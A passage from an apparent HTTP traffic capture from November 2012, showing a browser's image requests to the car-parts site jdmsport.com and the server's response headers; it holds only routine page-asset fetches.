Keep-Alive: timeout=15, max=89
Connection: Keep-Alive
GET /catalog/modules/mod_yoo_login/styles/default/images/username_bg.png HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/modules/mod_yoo_login/mod_yoo_login.css.php
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: image/png
Date: Thu, 08 Nov 2012 02:26:51 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Thu, 03 Feb 2011 20:42:35 GMT
Etag: &quot;1004576-8e0-4d4b133b&quot;
Accept-Ranges: bytes
Content-Length: 2272
Keep-Alive: timeout=15, max=83
Connection: Keep-Alive
GET /catalog/modules/mod_yoo_login/styles/default/images/password_bg.png HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/modules/mod_yoo_login/mod_yoo_login.css.php
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: image/png
Date: Thu, 08 Nov 2012 02:26:51 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Thu, 03 Feb 2011 20:42:35 GMT
Etag: &quot;1004575-670-4d4b133b&quot;
Accept-Ranges: bytes
Content-Length: 1648
Keep-Alive: timeout=15, max=88
Connection: Keep-Alive
GET /catalog/modules/mod_yoo_login/styles/default/images/login_button_bg.png HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/modules/mod_yoo_login/mod_yoo_login.css.php
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: image/png
Date: Thu, 08 Nov 2012 02:26:51 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Thu, 03 Feb 2011 20:42:35 GMT
Etag: &quot;1004573-bd1-4d4b133b&quot;
Accept-Ranges: bytes
Content-Length: 3025
Keep-Alive: timeout=15, max=82
Connection: Keep-Alive
GET /catalog/templates/yoo_crystal/images/footer_t.png HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/templates/yoo_crystal/css/layout.css
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: image/png
Date: Thu, 08 Nov 2012 02:26:51 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Thu, 03 Feb 2011 18:18:43 GMT
Etag: &quot;1005413-1e2-4d4af183&quot;
Accept-Ranges: bytes
Content-Length: 482
Keep-Alive: timeout=15, max=87
Connection: Keep-Alive
GET /catalog/templates/yoo_crystal/images/footer_anchor.png HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/templates/yoo_crystal/css/layout.css
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: image/png
Date: Thu, 08 Nov 2012 02:26:51 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Thu, 03 Feb 2011 18:18:43 GMT
Etag: &quot;1005412-15a-4d4af183&quot;
Accept-Ranges: bytes
Content-Length: 346
Keep-Alive: timeout=15, max=81
Connection: Keep-Alive
GET /catalog/templates/yoo_crystal/images/wrapper_b_shadow.png HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/templates/yoo_crystal/css/layout.css
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: image/png
Date: Thu, 08 Nov 2012 02:26:51 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Thu, 03 Feb 2011 18:18:43 GMT
Etag: &quot;1005451-28b-4d4af183&quot;
Accept-Ranges: bytes
Content-Length: 651
Keep-Alive: timeout=15, max=86
Connection: Keep-Alive
GET /catalog/images/M_images/daniellelo1.jpg HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Thu, 08 Nov 2012 02:26:47 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Wed, 04 Apr 2012 03:33:36 GMT
Etag: &quot;fff916-21add-4f7bc110&quot;
Accept-Ranges: bytes
Content-Length: 137949
Keep-Alive: timeout=15, max=84
Connection: Keep-Alive
GET /catalog/modules/mod_btslideshow/assets/skitter/images/prev.png HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/modules/mod_btslideshow/assets/skitter/css/skitter.styles.css
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: image/png
Date: Thu, 08 Nov 2012 02:26:51 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Wed, 18 Apr 2012 20:39:34 GMT
Etag: &quot;1009b11-374-4f8f2686&quot;
Accept-Ranges: bytes
Content-Length: 884
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
GET /catalog/modules/mod_btslideshow/assets/skitter/images/next.png HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/modules/mod_btslideshow/assets/skitter/css/skitter.styles.css
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: image/png
Date: Thu, 08 Nov 2012 02:26:51 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Wed, 18 Apr 2012 20:39:34 GMT
Etag: &quot;1009b10-384-4f8f2686&quot;
Accept-Ranges: bytes
Content-Length: 900
Keep-Alive: timeout=15, max=85
Connection: Keep-Alive
GET /catalog/modules/mod_btslideshow/images/72/thumbnail/jdmbannerdrifthandbrake.jpg HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Thu, 08 Nov 2012 02:26:51 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Fri, 20 Jul 2012 01:58:59 GMT
Etag: &quot;1009bb5-26e5-5008bb63&quot;
Accept-Ranges: bytes
Content-Length: 9957
Keep-Alive: timeout=15, max=83
Connection: Keep-Alive
GET /files/tnYWHJzw8Ef6158pl8W3Y5DU7a58x2Jjjl6yUnnyRytu9pyqWyqbsKd7Ut9gPkt6X5Kf5qTz8iKnehwd0UriBqd*Xa-vvX0g/HINLONG2.jpg HTTP/1.1

Host: api.ning.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
HTTP/1.1 200 OK

Content-Type: image/jpeg
Server: Ning HTTP Server 2.0
X-XN-Trace-Token: 66ff105e-1bfb-4064-bffe-0bd7ae650139
Last-Modified: Thu, 15 Mar 2012 01:03:44 GMT
Content-Length: 848265
Cache-Control: max-age=1852173
Expires: Thu, 29 Nov 2012 12:56:01 GMT
Date: Thu, 08 Nov 2012 02:26:28 GMT
Connection: keep-alive
GET /catalog/modules/mod_btslideshow/images/72/thumbnail/jdmsportkktnewsbanner.jpg HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Thu, 08 Nov 2012 02:26:52 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Thu, 31 May 2012 03:18:40 GMT
Etag: &quot;1009bab-2d82-4fc6e310&quot;
Accept-Ranges: bytes
Content-Length: 11650
Keep-Alive: timeout=15, max=79
Connection: Keep-Alive
GET /catalog/modules/mod_btslideshow/images/72/thumbnail/jdmbannermotionautoshow.jpg HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Thu, 08 Nov 2012 02:26:52 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Fri, 25 May 2012 01:49:48 GMT
Etag: &quot;1009ba3-30ec-4fbee53c&quot;
Accept-Ranges: bytes
Content-Length: 12524
Keep-Alive: timeout=15, max=84
Connection: Keep-Alive
GET /catalog/modules/mod_btslideshow/images/72/thumbnail/jdmbannerneochromelugnuts.jpg HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Thu, 08 Nov 2012 02:26:52 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Tue, 29 May 2012 22:56:15 GMT
Etag: &quot;1009ba7-2954-4fc5540f&quot;
Accept-Ranges: bytes
Content-Length: 10580
Keep-Alive: timeout=15, max=82
Connection: Keep-Alive
GET /vi/U9boP9RBDAM/hqdefault.jpg HTTP/1.1

Host: i2.ytimg.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Thu, 08 Nov 2012 02:26:52 GMT
Expires: Thu, 08 Nov 2012 08:26:52 GMT
Cache-Control: public, max-age=21600
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 21313
X-XSS-Protection: 1; mode=block
GET /catalog/modules/mod_btslideshow/images/72/thumbnail/jdmbannerneochrometowhooks.jpg HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Thu, 08 Nov 2012 02:26:52 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Wed, 23 May 2012 21:35:05 GMT
Etag: &quot;1009b68-25fa-4fbd5809&quot;
Accept-Ranges: bytes
Content-Length: 9722
Keep-Alive: timeout=15, max=78
Connection: Keep-Alive
GET /catalog/modules/mod_btslideshow/images/72/thumbnail/jdmbannerc.jpg HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Thu, 08 Nov 2012 02:26:52 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Fri, 27 Apr 2012 00:16:59 GMT
Etag: &quot;1009b47-2f5c-4f99e57b&quot;
Accept-Ranges: bytes
Content-Length: 12124
Keep-Alive: timeout=15, max=83
Connection: Keep-Alive
GET /catalog/modules/mod_btslideshow/images/72/thumbnail/jdmbannerb.jpg HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Thu, 08 Nov 2012 02:26:52 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Wed, 18 Apr 2012 22:40:52 GMT
Etag: &quot;1009a6f-2b32-4f8f42f4&quot;
Accept-Ranges: bytes
Content-Length: 11058
Keep-Alive: timeout=15, max=81
Connection: Keep-Alive
GET /catalog/images/stories/jdmsportneochrometowhookpromo1.jpg HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Thu, 08 Nov 2012 02:26:46 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Wed, 23 May 2012 20:42:06 GMT
Etag: &quot;fff947-329cb-4fbd4b9e&quot;
Accept-Ranges: bytes
Content-Length: 207307
Keep-Alive: timeout=15, max=85
Connection: Keep-Alive
GET /catalog/modules/mod_btslideshow/images/72/thumbnail/jdmbannera.jpg HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Thu, 08 Nov 2012 02:26:52 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Wed, 18 Apr 2012 22:40:52 GMT
Etag: &quot;1009a71-2785-4f8f42f4&quot;
Accept-Ranges: bytes
Content-Length: 10117
Keep-Alive: timeout=15, max=77
Connection: Keep-Alive
GET /catalog/modules/mod_btslideshow/images/72/thumbnail/jdmslideshowturbokits.jpg HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Thu, 08 Nov 2012 02:26:52 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Wed, 18 Apr 2012 22:40:52 GMT
Etag: &quot;1009a73-1f03-4f8f42f4&quot;
Accept-Ranges: bytes
Content-Length: 7939
Keep-Alive: timeout=15, max=82
Connection: Keep-Alive
GET /catalog/modules/mod_btslideshow/images/72/thumbnail/jdmslideshowtowhooks.jpg HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Thu, 08 Nov 2012 02:26:52 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Wed, 18 Apr 2012 22:40:53 GMT
Etag: &quot;1009a75-1b98-4f8f42f5&quot;
Accept-Ranges: bytes
Content-Length: 7064
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
GET /catalog/modules/mod_btslideshow/images/72/thumbnail/jdmslideshowmodels.jpg HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Thu, 08 Nov 2012 02:26:52 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Wed, 18 Apr 2012 22:40:53 GMT
Etag: &quot;1009a77-2083-4f8f42f5&quot;
Accept-Ranges: bytes
Content-Length: 8323
Keep-Alive: timeout=15, max=84
Connection: Keep-Alive
GET /catalog/modules/mod_btslideshow/images/72/thumbnail/jdmslideshowlugnuts.jpg HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Thu, 08 Nov 2012 02:26:52 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Wed, 18 Apr 2012 22:40:53 GMT
Etag: &quot;1009a79-2542-4f8f42f5&quot;
Accept-Ranges: bytes
Content-Length: 9538
Keep-Alive: timeout=15, max=76
Connection: Keep-Alive
GET /catalog/modules/mod_btslideshow/images/72/thumbnail/jdmslideshowgarage.jpg HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Thu, 08 Nov 2012 02:26:52 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Wed, 18 Apr 2012 22:40:54 GMT
Etag: &quot;1009a7b-292d-4f8f42f6&quot;
Accept-Ranges: bytes
Content-Length: 10541
Keep-Alive: timeout=15, max=81
Connection: Keep-Alive
GET /catalog/modules/mod_btslideshow/images/72/thumbnail/jdmslideshowfenderwasherkits.jpg HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Thu, 08 Nov 2012 02:26:52 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Wed, 18 Apr 2012 22:40:54 GMT
Etag: &quot;1009a7d-2825-4f8f42f6&quot;
Accept-Ranges: bytes
Content-Length: 10277
Keep-Alive: timeout=15, max=79
Connection: Keep-Alive
GET /catalog/modules/mod_btslideshow/images/72/thumbnail/jdmslideshowcontrolarms.jpg HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Thu, 08 Nov 2012 02:26:52 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Wed, 18 Apr 2012 22:40:54 GMT
